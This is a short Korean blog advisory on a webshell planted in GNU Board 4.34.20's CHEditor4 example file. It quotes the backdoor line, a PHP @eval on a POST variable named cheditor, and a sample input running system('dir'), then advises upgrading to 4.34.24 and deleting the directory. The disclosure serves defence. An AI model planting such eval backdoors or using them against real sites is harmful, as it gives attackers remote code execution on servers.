티스토리 뷰

GNU Board 그누보드 4.34.20 버젼 웹셀 삽입 취약점

 

/cheditor4/example/textarea.html 파일내 삽입

 

<?php @eval ($_POST[cheditor]); ?>

 


공격자는 cheditor 변수에 POST 메소드를 전송하여 임의의 PHP 코드 실행 가능 (아래 참조)

 

name='cheditor' value="system('dir');">

 

 

해결책 : 그누보드 4.34.24 이상으로 업그레이드후 CHEditor4 디렉토리 삭제

 - 최신 그누보드 설치디렉토리는 /cheditor4



gnuboard-4.34.20-webshell_report_20120509.pdf


댓글
공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today
Yesterday
링크
«   2026/02   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
글 보관함